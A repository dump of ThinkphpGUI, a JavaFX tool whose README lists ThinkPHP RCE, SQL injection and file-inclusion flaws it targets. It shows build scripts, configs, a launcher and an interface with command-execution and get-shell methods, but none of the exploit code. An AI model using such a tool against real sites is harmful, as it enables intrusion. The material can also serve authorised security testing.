├── .gitignore
├── .idea
├── .gitignore
├── artifacts
│ └── ThinkphpGUI_jar.xml
├── encodings.xml
├── misc.xml
├── uiDesigner.xml
└── vcs.xml
├── .mvn
└── wrapper
│ ├── maven-wrapper.jar
│ └── maven-wrapper.properties
├── README.md
├── mvnw
├── mvnw.cmd
├── pom.xml
└── src
└── main
├── java
└── com
│ └── thinkphp
│ └── thinkphpgui
│ ├── ThinkPhpGuiApplication.java
│ ├── common
│ ├── BasePayload.java
│ └── ProxyAuthenticator.java
│ ├── controller
│ └── ThinkphpGUIController.java
│ ├── entity
│ └── Result.java
│ ├── exploit
│ ├── tp2_rce.java
│ ├── tp3.java
│ ├── tp3_log.java
│ ├── tp3_log_rce.java
│ ├── tp50.java
│ ├── tp5010.java
│ ├── tp5022_5129.java
│ ├── tp5023.java
│ ├── tp5024_5130.java
│ ├── tp5_db.java
│ ├── tp5_file_inclusion.java
│ ├── tp5_info_leak.java
│ ├── tp5_log.java
│ ├── tp5_method_filter_rce.java
│ ├── tp5_session_include.java
│ ├── tp5_showid_rce.java
│ ├── tp5_sql.java
│ ├── tp6_lang.java
│ ├── tp6_log.java
│ ├── tp6_session_file_write.java
│ ├── tp_catch.java
│ ├── tp_checkcode_time_sqli.java
│ ├── tp_multi_sql_leak.java
│ ├── tp_pay_orderid_sqli.java
│ ├── tp_update_sql.java
│ └── tp_view_recent_xff_sqli.java
│ ├── service
│ ├── BatchCheckTask.java
│ └── CheckTask.java
│ └── util
│ ├── ExpList.java
│ ├── Module.java
│ └── Tools.java
└── resources
├── META-INF
└── MANIFEST.MF
└── com
└── thinkphp
└── thinkphpgui
└── thinkphp-view.fxml
/.gitignore:
--------------------------------------------------------------------------------
1 | target/
2 | !.mvn/wrapper/maven-wrapper.jar
3 | !**/src/main/**/target/
4 | !**/src/test/**/target/
5 |
6 | ### IntelliJ IDEA ###
7 | .idea/modules.xml
8 | .idea/jarRepositories.xml
9 | .idea/compiler.xml
10 | .idea/libraries/
11 | *.iws
12 | *.iml
13 | *.ipr
14 |
15 | ### Eclipse ###
16 | .apt_generated
17 | .classpath
18 | .factorypath
19 | .project
20 | .settings
21 | .springBeans
22 | .sts4-cache
23 |
24 | ### NetBeans ###
25 | /nbproject/private/
26 | /nbbuild/
27 | /dist/
28 | /nbdist/
29 | /.nb-gradle/
30 | build/
31 | !**/src/main/**/build/
32 | !**/src/test/**/build/
33 |
34 | ### VS Code ###
35 | .vscode/
36 |
37 | ### Mac OS ###
38 | .DS_Store
--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 |
--------------------------------------------------------------------------------
/.idea/artifacts/ThinkphpGUI_jar.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | $PROJECT_DIR$/out/artifacts/ThinkphpGUI_jar
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/.idea/uiDesigner.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | -
6 |
7 |
8 | -
9 |
10 |
11 | -
12 |
13 |
14 | -
15 |
16 |
17 | -
18 |
19 |
20 |
21 |
22 |
23 | -
24 |
25 |
26 |
27 |
28 |
29 | -
30 |
31 |
32 |
33 |
34 |
35 | -
36 |
37 |
38 |
39 |
40 |
41 | -
42 |
43 |
44 |
45 |
46 | -
47 |
48 |
49 |
50 |
51 | -
52 |
53 |
54 |
55 |
56 | -
57 |
58 |
59 |
60 |
61 | -
62 |
63 |
64 |
65 |
66 | -
67 |
68 |
69 |
70 |
71 | -
72 |
73 |
74 | -
75 |
76 |
77 |
78 |
79 | -
80 |
81 |
82 |
83 |
84 | -
85 |
86 |
87 |
88 |
89 | -
90 |
91 |
92 |
93 |
94 | -
95 |
96 |
97 |
98 |
99 | -
100 |
101 |
102 | -
103 |
104 |
105 | -
106 |
107 |
108 | -
109 |
110 |
111 | -
112 |
113 |
114 |
115 |
116 | -
117 |
118 |
119 | -
120 |
121 |
122 |
123 |
124 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.mvn/wrapper/maven-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nex121/ThinkphpGUI/e2f6844194b95fe7c69ce56df7de3d4c02666ca9/.mvn/wrapper/maven-wrapper.jar
--------------------------------------------------------------------------------
/.mvn/wrapper/maven-wrapper.properties:
--------------------------------------------------------------------------------
1 | distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.8.5/apache-maven-3.8.5-bin.zip
2 | wrapperUrl=https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ThinkphpGUI
2 |
3 | 改自https://github.com/Lotus6/ThinkphpGUI
4 |
5 | #新增poc,全部漏洞列表如下:
6 |
7 | ThinkPHP 5.0 RCE
8 |
9 | ThinkPHP 5.0.10 RCE
10 |
11 | ThinkPHP 5.0.22/5.1.29 RCE
12 |
13 | ThinkPHP 5.0.23 RCE
14 |
15 | ThinkPHP 5.0.24-5.1.30 RCE
16 |
17 | ThinkPHP 5 文件包含漏洞
18 |
19 | ThinkPHP 5 show-id RCE
20 |
21 | ThinkPHP 5 method filter RCE
22 |
23 | ThinkPHP 5 session 文件包含漏洞
24 |
25 | ThinkPHP 5 SQL注入漏洞 && 敏感信息泄露
26 |
27 | ThinkPHP 5.x 数据库信息泄露
28 |
29 | ThinkPHP 5.x 日志泄露
30 |
31 | ThinkPHP 3.x RCE
32 |
33 | ThinkPHP 3.x 日志泄露
34 |
35 | ThinkPHP 3.x Log RCE
36 |
37 | ThinkPHP 6.x 日志泄露
38 |
39 | ThinkPHP 6 文件包含漏洞
40 |
41 | ThinkPHP 6 session文件写入
42 |
43 | ThinkPHP catch 命令执行漏洞
44 |
45 | ThinkPHP check-code sql注入漏洞
46 |
47 | ThinkPHP multi sql注入 && 信息泄露漏洞
48 |
49 | ThinkPHP orderid sql注入
50 |
51 | ThinkPHP update sql注入
52 |
53 | ThinkPHP recent_xff sql注入
54 |
55 | #界面如下
56 |
57 | 
58 |
59 | 
60 |
61 |
--------------------------------------------------------------------------------
/mvnw:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | # ----------------------------------------------------------------------------
3 | # Licensed to the Apache Software Foundation (ASF) under one
4 | # or more contributor license agreements. See the NOTICE file
5 | # distributed with this work for additional information
6 | # regarding copyright ownership. The ASF licenses this file
7 | # to you under the Apache License, Version 2.0 (the
8 | # "License"); you may not use this file except in compliance
9 | # with the License. You may obtain a copy of the License at
10 | #
11 | # https://www.apache.org/licenses/LICENSE-2.0
12 | #
13 | # Unless required by applicable law or agreed to in writing,
14 | # software distributed under the License is distributed on an
15 | # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
16 | # KIND, either express or implied. See the License for the
17 | # specific language governing permissions and limitations
18 | # under the License.
19 | # ----------------------------------------------------------------------------
20 |
21 | # ----------------------------------------------------------------------------
22 | # Maven Start Up Batch script
23 | #
24 | # Required ENV vars:
25 | # ------------------
26 | # JAVA_HOME - location of a JDK home dir
27 | #
28 | # Optional ENV vars
29 | # -----------------
30 | # M2_HOME - location of maven2's installed home dir
31 | # MAVEN_OPTS - parameters passed to the Java VM when running Maven
32 | # e.g. to debug Maven itself, use
33 | # set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
34 | # MAVEN_SKIP_RC - flag to disable loading of mavenrc files
35 | # ----------------------------------------------------------------------------
36 |
37 | if [ -z "$MAVEN_SKIP_RC" ] ; then
38 |
39 | if [ -f /usr/local/etc/mavenrc ] ; then
40 | . /usr/local/etc/mavenrc
41 | fi
42 |
43 | if [ -f /etc/mavenrc ] ; then
44 | . /etc/mavenrc
45 | fi
46 |
47 | if [ -f "$HOME/.mavenrc" ] ; then
48 | . "$HOME/.mavenrc"
49 | fi
50 |
51 | fi
52 |
53 | # OS specific support. $var _must_ be set to either true or false.
54 | cygwin=false;
55 | darwin=false;
56 | mingw=false
57 | case "`uname`" in
58 | CYGWIN*) cygwin=true ;;
59 | MINGW*) mingw=true;;
60 | Darwin*) darwin=true
61 | # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home
62 | # See https://developer.apple.com/library/mac/qa/qa1170/_index.html
63 | if [ -z "$JAVA_HOME" ]; then
64 | if [ -x "/usr/libexec/java_home" ]; then
65 | export JAVA_HOME="`/usr/libexec/java_home`"
66 | else
67 | export JAVA_HOME="/Library/Java/Home"
68 | fi
69 | fi
70 | ;;
71 | esac
72 |
73 | if [ -z "$JAVA_HOME" ] ; then
74 | if [ -r /etc/gentoo-release ] ; then
75 | JAVA_HOME=`java-config --jre-home`
76 | fi
77 | fi
78 |
79 | if [ -z "$M2_HOME" ] ; then
80 | ## resolve links - $0 may be a link to maven's home
81 | PRG="$0"
82 |
83 | # need this for relative symlinks
84 | while [ -h "$PRG" ] ; do
85 | ls=`ls -ld "$PRG"`
86 | link=`expr "$ls" : '.*-> \(.*\)$'`
87 | if expr "$link" : '/.*' > /dev/null; then
88 | PRG="$link"
89 | else
90 | PRG="`dirname "$PRG"`/$link"
91 | fi
92 | done
93 |
94 | saveddir=`pwd`
95 |
96 | M2_HOME=`dirname "$PRG"`/..
97 |
98 | # make it fully qualified
99 | M2_HOME=`cd "$M2_HOME" && pwd`
100 |
101 | cd "$saveddir"
102 | # echo Using m2 at $M2_HOME
103 | fi
104 |
105 | # For Cygwin, ensure paths are in UNIX format before anything is touched
106 | if $cygwin ; then
107 | [ -n "$M2_HOME" ] &&
108 | M2_HOME=`cygpath --unix "$M2_HOME"`
109 | [ -n "$JAVA_HOME" ] &&
110 | JAVA_HOME=`cygpath --unix "$JAVA_HOME"`
111 | [ -n "$CLASSPATH" ] &&
112 | CLASSPATH=`cygpath --path --unix "$CLASSPATH"`
113 | fi
114 |
115 | # For Mingw, ensure paths are in UNIX format before anything is touched
116 | if $mingw ; then
117 | [ -n "$M2_HOME" ] &&
118 | M2_HOME="`(cd "$M2_HOME"; pwd)`"
119 | [ -n "$JAVA_HOME" ] &&
120 | JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`"
121 | fi
122 |
123 | if [ -z "$JAVA_HOME" ]; then
124 | javaExecutable="`which javac`"
125 | if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then
126 | # readlink(1) is not available as standard on Solaris 10.
127 | readLink=`which readlink`
128 | if [ ! `expr "$readLink" : '\([^ ]*\)'` = "no" ]; then
129 | if $darwin ; then
130 | javaHome="`dirname \"$javaExecutable\"`"
131 | javaExecutable="`cd \"$javaHome\" && pwd -P`/javac"
132 | else
133 | javaExecutable="`readlink -f \"$javaExecutable\"`"
134 | fi
135 | javaHome="`dirname \"$javaExecutable\"`"
136 | javaHome=`expr "$javaHome" : '\(.*\)/bin'`
137 | JAVA_HOME="$javaHome"
138 | export JAVA_HOME
139 | fi
140 | fi
141 | fi
142 |
143 | if [ -z "$JAVACMD" ] ; then
144 | if [ -n "$JAVA_HOME" ] ; then
145 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
146 | # IBM's JDK on AIX uses strange locations for the executables
147 | JAVACMD="$JAVA_HOME/jre/sh/java"
148 | else
149 | JAVACMD="$JAVA_HOME/bin/java"
150 | fi
151 | else
152 | JAVACMD="`\\unset -f command; \\command -v java`"
153 | fi
154 | fi
155 |
156 | if [ ! -x "$JAVACMD" ] ; then
157 | echo "Error: JAVA_HOME is not defined correctly." >&2
158 | echo " We cannot execute $JAVACMD" >&2
159 | exit 1
160 | fi
161 |
162 | if [ -z "$JAVA_HOME" ] ; then
163 | echo "Warning: JAVA_HOME environment variable is not set."
164 | fi
165 |
166 | CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher
167 |
168 | # traverses directory structure from process work directory to filesystem root
169 | # first directory with .mvn subdirectory is considered project base directory
170 | find_maven_basedir() {
171 |
172 | if [ -z "$1" ]
173 | then
174 | echo "Path not specified to find_maven_basedir"
175 | return 1
176 | fi
177 |
178 | basedir="$1"
179 | wdir="$1"
180 | while [ "$wdir" != '/' ] ; do
181 | if [ -d "$wdir"/.mvn ] ; then
182 | basedir=$wdir
183 | break
184 | fi
185 | # workaround for JBEAP-8937 (on Solaris 10/Sparc)
186 | if [ -d "${wdir}" ]; then
187 | wdir=`cd "$wdir/.."; pwd`
188 | fi
189 | # end of workaround
190 | done
191 | echo "${basedir}"
192 | }
193 |
194 | # concatenates all lines of a file
195 | concat_lines() {
196 | if [ -f "$1" ]; then
197 | echo "$(tr -s '\n' ' ' < "$1")"
198 | fi
199 | }
200 |
201 | BASE_DIR=`find_maven_basedir "$(pwd)"`
202 | if [ -z "$BASE_DIR" ]; then
203 | exit 1;
204 | fi
205 |
206 | ##########################################################################################
207 | # Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
208 | # This allows using the maven wrapper in projects that prohibit checking in binary data.
209 | ##########################################################################################
210 | if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then
211 | if [ "$MVNW_VERBOSE" = true ]; then
212 | echo "Found .mvn/wrapper/maven-wrapper.jar"
213 | fi
214 | else
215 | if [ "$MVNW_VERBOSE" = true ]; then
216 | echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..."
217 | fi
218 | if [ -n "$MVNW_REPOURL" ]; then
219 | jarUrl="$MVNW_REPOURL/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
220 | else
221 | jarUrl="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
222 | fi
223 | while IFS="=" read key value; do
224 | case "$key" in (wrapperUrl) jarUrl="$value"; break ;;
225 | esac
226 | done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties"
227 | if [ "$MVNW_VERBOSE" = true ]; then
228 | echo "Downloading from: $jarUrl"
229 | fi
230 | wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar"
231 | if $cygwin; then
232 | wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"`
233 | fi
234 |
235 | if command -v wget > /dev/null; then
236 | if [ "$MVNW_VERBOSE" = true ]; then
237 | echo "Found wget ... using wget"
238 | fi
239 | if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
240 | wget "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath"
241 | else
242 | wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath" || rm -f "$wrapperJarPath"
243 | fi
244 | elif command -v curl > /dev/null; then
245 | if [ "$MVNW_VERBOSE" = true ]; then
246 | echo "Found curl ... using curl"
247 | fi
248 | if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
249 | curl -o "$wrapperJarPath" "$jarUrl" -f
250 | else
251 | curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f
252 | fi
253 |
254 | else
255 | if [ "$MVNW_VERBOSE" = true ]; then
256 | echo "Falling back to using Java to download"
257 | fi
258 | javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
259 | # For Cygwin, switch paths to Windows format before running javac
260 | if $cygwin; then
261 | javaClass=`cygpath --path --windows "$javaClass"`
262 | fi
263 | if [ -e "$javaClass" ]; then
264 | if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
265 | if [ "$MVNW_VERBOSE" = true ]; then
266 | echo " - Compiling MavenWrapperDownloader.java ..."
267 | fi
268 | # Compiling the Java class
269 | ("$JAVA_HOME/bin/javac" "$javaClass")
270 | fi
271 | if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
272 | # Running the downloader
273 | if [ "$MVNW_VERBOSE" = true ]; then
274 | echo " - Running MavenWrapperDownloader.java ..."
275 | fi
276 | ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
277 | fi
278 | fi
279 | fi
280 | fi
281 | ##########################################################################################
282 | # End of extension
283 | ##########################################################################################
284 |
285 | export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
286 | if [ "$MVNW_VERBOSE" = true ]; then
287 | echo $MAVEN_PROJECTBASEDIR
288 | fi
289 | MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"
290 |
291 | # For Cygwin, switch paths to Windows format before running java
292 | if $cygwin; then
293 | [ -n "$M2_HOME" ] &&
294 | M2_HOME=`cygpath --path --windows "$M2_HOME"`
295 | [ -n "$JAVA_HOME" ] &&
296 | JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
297 | [ -n "$CLASSPATH" ] &&
298 | CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
299 | [ -n "$MAVEN_PROJECTBASEDIR" ] &&
300 | MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
301 | fi
302 |
303 | # Provide a "standardized" way to retrieve the CLI args that will
304 | # work with both Windows and non-Windows executions.
305 | MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@"
306 | export MAVEN_CMD_LINE_ARGS
307 |
308 | WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
309 |
310 | exec "$JAVACMD" \
311 | $MAVEN_OPTS \
312 | $MAVEN_DEBUG_OPTS \
313 | -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
314 | "-Dmaven.home=${M2_HOME}" \
315 | "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
316 | ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"
317 |
--------------------------------------------------------------------------------
/mvnw.cmd:
--------------------------------------------------------------------------------
1 | @REM ----------------------------------------------------------------------------
2 | @REM Licensed to the Apache Software Foundation (ASF) under one
3 | @REM or more contributor license agreements. See the NOTICE file
4 | @REM distributed with this work for additional information
5 | @REM regarding copyright ownership. The ASF licenses this file
6 | @REM to you under the Apache License, Version 2.0 (the
7 | @REM "License"); you may not use this file except in compliance
8 | @REM with the License. You may obtain a copy of the License at
9 | @REM
10 | @REM https://www.apache.org/licenses/LICENSE-2.0
11 | @REM
12 | @REM Unless required by applicable law or agreed to in writing,
13 | @REM software distributed under the License is distributed on an
14 | @REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
15 | @REM KIND, either express or implied. See the License for the
16 | @REM specific language governing permissions and limitations
17 | @REM under the License.
18 | @REM ----------------------------------------------------------------------------
19 |
20 | @REM ----------------------------------------------------------------------------
21 | @REM Maven Start Up Batch script
22 | @REM
23 | @REM Required ENV vars:
24 | @REM JAVA_HOME - location of a JDK home dir
25 | @REM
26 | @REM Optional ENV vars
27 | @REM M2_HOME - location of maven2's installed home dir
28 | @REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
29 | @REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending
30 | @REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
31 | @REM e.g. to debug Maven itself, use
32 | @REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
33 | @REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
34 | @REM ----------------------------------------------------------------------------
35 |
36 | @REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
37 | @echo off
38 | @REM set title of command window
39 | title %0
40 | @REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
41 | @if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO%
42 |
43 | @REM set %HOME% to equivalent of $HOME
44 | if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
45 |
46 | @REM Execute a user defined script before this one
47 | if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
48 | @REM check for pre script, once with legacy .bat ending and once with .cmd ending
49 | if exist "%USERPROFILE%\mavenrc_pre.bat" call "%USERPROFILE%\mavenrc_pre.bat" %*
50 | if exist "%USERPROFILE%\mavenrc_pre.cmd" call "%USERPROFILE%\mavenrc_pre.cmd" %*
51 | :skipRcPre
52 |
53 | @setlocal
54 |
55 | set ERROR_CODE=0
56 |
57 | @REM To isolate internal variables from possible post scripts, we use another setlocal
58 | @setlocal
59 |
60 | @REM ==== START VALIDATION ====
61 | if not "%JAVA_HOME%" == "" goto OkJHome
62 |
63 | echo.
64 | echo Error: JAVA_HOME not found in your environment. >&2
65 | echo Please set the JAVA_HOME variable in your environment to match the >&2
66 | echo location of your Java installation. >&2
67 | echo.
68 | goto error
69 |
70 | :OkJHome
71 | if exist "%JAVA_HOME%\bin\java.exe" goto init
72 |
73 | echo.
74 | echo Error: JAVA_HOME is set to an invalid directory. >&2
75 | echo JAVA_HOME = "%JAVA_HOME%" >&2
76 | echo Please set the JAVA_HOME variable in your environment to match the >&2
77 | echo location of your Java installation. >&2
78 | echo.
79 | goto error
80 |
81 | @REM ==== END VALIDATION ====
82 |
83 | :init
84 |
85 | @REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
86 | @REM Fallback to current working directory if not found.
87 |
88 | set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
89 | IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
90 |
91 | set EXEC_DIR=%CD%
92 | set WDIR=%EXEC_DIR%
93 | :findBaseDir
94 | IF EXIST "%WDIR%"\.mvn goto baseDirFound
95 | cd ..
96 | IF "%WDIR%"=="%CD%" goto baseDirNotFound
97 | set WDIR=%CD%
98 | goto findBaseDir
99 |
100 | :baseDirFound
101 | set MAVEN_PROJECTBASEDIR=%WDIR%
102 | cd "%EXEC_DIR%"
103 | goto endDetectBaseDir
104 |
105 | :baseDirNotFound
106 | set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
107 | cd "%EXEC_DIR%"
108 |
109 | :endDetectBaseDir
110 |
111 | IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
112 |
113 | @setlocal EnableExtensions EnableDelayedExpansion
114 | for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
115 | @endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
116 |
117 | :endReadAdditionalConfig
118 |
119 | SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
120 | set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
121 | set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
122 |
123 | set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
124 |
125 | FOR /F "usebackq tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO (
126 | IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
127 | )
128 |
129 | @REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
130 | @REM This allows using the maven wrapper in projects that prohibit checking in binary data.
131 | if exist %WRAPPER_JAR% (
132 | if "%MVNW_VERBOSE%" == "true" (
133 | echo Found %WRAPPER_JAR%
134 | )
135 | ) else (
136 | if not "%MVNW_REPOURL%" == "" (
137 | SET DOWNLOAD_URL="%MVNW_REPOURL%/org/apache/maven/wrapper/maven-wrapper/3.1.0/maven-wrapper-3.1.0.jar"
138 | )
139 | if "%MVNW_VERBOSE%" == "true" (
140 | echo Couldn't find %WRAPPER_JAR%, downloading it ...
141 | echo Downloading from: %DOWNLOAD_URL%
142 | )
143 |
144 | powershell -Command "&{"^
145 | "$webclient = new-object System.Net.WebClient;"^
146 | "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^
147 | "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^
148 | "}"^
149 | "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^
150 | "}"
151 | if "%MVNW_VERBOSE%" == "true" (
152 | echo Finished downloading %WRAPPER_JAR%
153 | )
154 | )
155 | @REM End of extension
156 |
157 | @REM Provide a "standardized" way to retrieve the CLI args that will
158 | @REM work with both Windows and non-Windows executions.
159 | set MAVEN_CMD_LINE_ARGS=%*
160 |
161 | %MAVEN_JAVA_EXE% ^
162 | %JVM_CONFIG_MAVEN_PROPS% ^
163 | %MAVEN_OPTS% ^
164 | %MAVEN_DEBUG_OPTS% ^
165 | -classpath %WRAPPER_JAR% ^
166 | "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" ^
167 | %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
168 | if ERRORLEVEL 1 goto error
169 | goto end
170 |
171 | :error
172 | set ERROR_CODE=1
173 |
174 | :end
175 | @endlocal & set ERROR_CODE=%ERROR_CODE%
176 |
177 | if not "%MAVEN_SKIP_RC%"=="" goto skipRcPost
178 | @REM check for post script, once with legacy .bat ending and once with .cmd ending
179 | if exist "%USERPROFILE%\mavenrc_post.bat" call "%USERPROFILE%\mavenrc_post.bat"
180 | if exist "%USERPROFILE%\mavenrc_post.cmd" call "%USERPROFILE%\mavenrc_post.cmd"
181 | :skipRcPost
182 |
183 | @REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
184 | if "%MAVEN_BATCH_PAUSE%"=="on" pause
185 |
186 | if "%MAVEN_TERMINATE_CMD%"=="on" exit %ERROR_CODE%
187 |
188 | cmd /C exit /B %ERROR_CODE%
189 |
--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 | 4.0.0
6 |
7 | com.thinkphp
8 | ThinkphpGUI
9 | 1.0-SNAPSHOT
10 | ThinkphpGUI
11 |
12 |
13 | UTF-8
14 | 5.9.1
15 |
16 |
17 |
18 |
19 | com.github.kevinsawicki
20 | http-request
21 | 6.0
22 |
23 |
24 |
25 | org.openjfx
26 | javafx-controls
27 | 17.0.2
28 |
29 |
30 | org.openjfx
31 | javafx-fxml
32 | 17.0.2
33 |
34 |
35 |
36 | org.junit.jupiter
37 | junit-jupiter-api
38 | ${junit.version}
39 | test
40 |
41 |
42 | org.junit.jupiter
43 | junit-jupiter-engine
44 | ${junit.version}
45 | test
46 |
47 |
48 |
49 |
50 |
51 |
52 | org.apache.maven.plugins
53 | maven-compiler-plugin
54 | 3.10.1
55 |
56 | 8
57 | 8
58 |
59 |
60 |
61 | org.openjfx
62 | javafx-maven-plugin
63 | 0.0.8
64 |
65 |
66 |
67 | default-cli
68 |
69 | com.thinkphp.thinkphpgui/com.thinkphp.thinkphpgui.HelloApplication
70 | app
71 | app
72 | app
73 | true
74 | true
75 | true
76 |
77 |
78 |
79 |
80 |
81 |
82 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/ThinkPhpGuiApplication.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui;
2 |
3 | import javafx.application.Application;
4 | import javafx.fxml.FXMLLoader;
5 | import javafx.scene.Scene;
6 | import javafx.stage.Stage;
7 |
8 | import java.io.IOException;
9 |
10 | public class ThinkPhpGuiApplication extends Application {
11 | @Override
12 | public void start(Stage stage) throws IOException {
13 | FXMLLoader fxmlLoader = new FXMLLoader(ThinkPhpGuiApplication.class.getResource("thinkphp-view.fxml"));
14 | Scene scene = new Scene(fxmlLoader.load(), 1200, 800);
15 | stage.setTitle("thinkphp检测工具,项目源地址:https://github.com/Lotus6/ThinkphpGUI by nex121");
16 | stage.setScene(scene);
17 | stage.show();
18 | }
19 |
20 | public static void main(String[] args) {
21 | launch();
22 | }
23 | }
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/common/BasePayload.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.common;
2 |
3 | import com.thinkphp.thinkphpgui.entity.Result;
4 |
5 | public interface BasePayload {
6 | Result checkVUL(String url) throws Exception;
7 |
8 | Result exeVUL(String url, String cmd) throws Exception;
9 |
10 | Result getShell(String url) throws Exception;
11 | }
12 |
--------------------------------------------------------------------------------
/src/main/java/com/thinkphp/thinkphpgui/common/ProxyAuthenticator.java:
--------------------------------------------------------------------------------
1 | package com.thinkphp.thinkphpgui.common;
2 |
3 | import java.net.Authenticator;
